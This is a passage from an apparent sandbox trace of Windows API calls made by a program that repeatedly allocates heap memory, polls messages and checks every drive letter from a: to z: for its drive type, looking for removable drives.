dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.630] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.630] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.630] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.630] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.631] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.631] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef860 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.631] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7a0 [0214.631] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.631] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.631] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.632] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.632] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.632] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.632] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.632] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.632] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.632] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.632] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.633] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.633] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.633] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.633] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.633] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.634] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.634] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.634] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.634] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.634] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.634] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.634] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.635] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.635] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.635] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.635] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.635] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.635] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef860 | out: hHeap=0x12c0000) returned 1 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.636] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef820 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f40 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.636] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f40 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef820 | out: hHeap=0x12c0000) returned 1 [0214.636] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e400 [0214.636] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e400 | out: hHeap=0x12c0000) returned 1 [0214.636] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef850 | out: hHeap=0x12c0000) returned 1 [0214.636] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.637] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.637] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef810 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318c78 [0214.637] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318c78 | out: hHeap=0x12c0000) returned 1 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef810 | out: hHeap=0x12c0000) returned 1 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd100 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.637] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7e0 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef800 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.637] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef800 | out: hHeap=0x12c0000) returned 1 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef880 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef770 [0214.637] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fef38 [0214.638] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.638] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.638] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.638] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.638] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.638] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.638] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.639] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.639] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.639] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.639] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.639] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.640] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.640] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.640] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.640] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.641] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.641] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.641] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.641] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.641] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.641] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.642] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.642] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.642] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.642] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.642] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fef38 | out: hHeap=0x12c0000) returned 1 [0214.642] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd340 | out: hHeap=0x12c0000) returned 1 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7e0 | out: hHeap=0x12c0000) returned 1 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12febc8 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd1d8 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6e0 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.643] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8a0 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2b0 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef830 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325e80 [0214.643] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.643] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2b0 | out: hHeap=0x12c0000) returned 1 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325e80 | out: hHeap=0x12c0000) returned 1 [0214.643] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef830 | out: hHeap=0x12c0000) returned 1 [0214.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8a0 | out: hHeap=0x12c0000) returned 1 [0214.644] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e4c0 [0214.644] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e4c0 | out: hHeap=0x12c0000) returned 1 [0214.644] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef880 | out: hHeap=0x12c0000) returned 1 [0214.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd208 | out: hHeap=0x12c0000) returned 1 [0214.644] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd1d8 | out: hHeap=0x12c0000) returned 1 [0214.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12febc8 | out: hHeap=0x12c0000) returned 1 [0214.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.645] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef770 [0214.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef770 | out: hHeap=0x12c0000) returned 1 [0214.645] PeekMessageW (in: lpMsg=0x7dfde4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfde4) returned 0 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef7d0 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.645] CharUpperBuffW (in: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP", cchLength=0x1d | out: lpsz="TLRQDAKNGKXFDWQNVSPQPWUUICTCP") returned 0x1d [0214.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.645] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0xc) returned 0x14bd1d8 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x1318b10 [0214.645] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef8b0 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.645] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0214.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd370 [0214.646] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0214.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd298 [0214.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd310 [0214.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef730 [0214.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0214.646] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fec40 [0214.646] CharLowerBuffW (in: lpsz="REMOVABLE", cchLength=0x9 | out: lpsz="removable") returned 0x9 [0214.646] GetDriveTypeW (lpRootPathName="a:\\") returned 0x1 [0214.646] GetDriveTypeW (lpRootPathName="b:\\") returned 0x1 [0214.646] GetDriveTypeW (lpRootPathName="c:\\") returned 0x3 [0214.647] GetDriveTypeW (lpRootPathName="d:\\") returned 0x1 [0214.647] GetDriveTypeW (lpRootPathName="e:\\") returned 0x1 [0214.647] GetDriveTypeW (lpRootPathName="f:\\") returned 0x1 [0214.647] GetDriveTypeW (lpRootPathName="g:\\") returned 0x1 [0214.647] GetDriveTypeW (lpRootPathName="h:\\") returned 0x1 [0214.647] GetDriveTypeW (lpRootPathName="i:\\") returned 0x1 [0214.648] GetDriveTypeW (lpRootPathName="j:\\") returned 0x1 [0214.648] GetDriveTypeW (lpRootPathName="k:\\") returned 0x1 [0214.648] GetDriveTypeW (lpRootPathName="l:\\") returned 0x1 [0214.648] GetDriveTypeW (lpRootPathName="m:\\") returned 0x1 [0214.648] GetDriveTypeW (lpRootPathName="n:\\") returned 0x1 [0214.648] GetDriveTypeW (lpRootPathName="o:\\") returned 0x1 [0214.649] GetDriveTypeW (lpRootPathName="p:\\") returned 0x1 [0214.649] GetDriveTypeW (lpRootPathName="q:\\") returned 0x1 [0214.649] GetDriveTypeW (lpRootPathName="r:\\") returned 0x1 [0214.649] GetDriveTypeW (lpRootPathName="s:\\") returned 0x1 [0214.649] GetDriveTypeW (lpRootPathName="t:\\") returned 0x1 [0214.650] GetDriveTypeW (lpRootPathName="u:\\") returned 0x1 [0214.650] GetDriveTypeW (lpRootPathName="v:\\") returned 0x1 [0214.653] GetDriveTypeW (lpRootPathName="w:\\") returned 0x1 [0214.654] GetDriveTypeW (lpRootPathName="x:\\") returned 0x1 [0214.654] GetDriveTypeW (lpRootPathName="y:\\") returned 0x1 [0214.654] GetDriveTypeW (lpRootPathName="z:\\") returned 0x1 [0214.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fec40 | out: hHeap=0x12c0000) returned 1 [0214.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0214.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd370 | out: hHeap=0x12c0000) returned 1 [0214.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd2f8 | out: hHeap=0x12c0000) returned 1 [0214.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12fee70 | out: hHeap=0x12c0000) returned 1 [0214.654] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef8b0 | out: hHeap=0x12c0000) returned 1 [0214.654] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12fee70 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd2f8 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef800 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd208 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd340 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd298 | out: hHeap=0x12c0000) returned 1 [0214.655] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7a0 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd358 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef7d0 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1325f80 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd100 [0214.655] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="", cchCount1=0, lpString2="", cchCount2=0) returned 2 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd358 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd100 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1325f80 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7d0 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef7a0 | out: hHeap=0x12c0000) returned 1 [0214.655] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x132e140 [0214.655] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x132e140 | out: hHeap=0x12c0000) returned 1 [0214.655] PeekMessageW (in: lpMsg=0x7dfb8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7dfb8c) returned 0 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1318b10 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd310 | out: hHeap=0x12c0000) returned 1 [0214.655] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 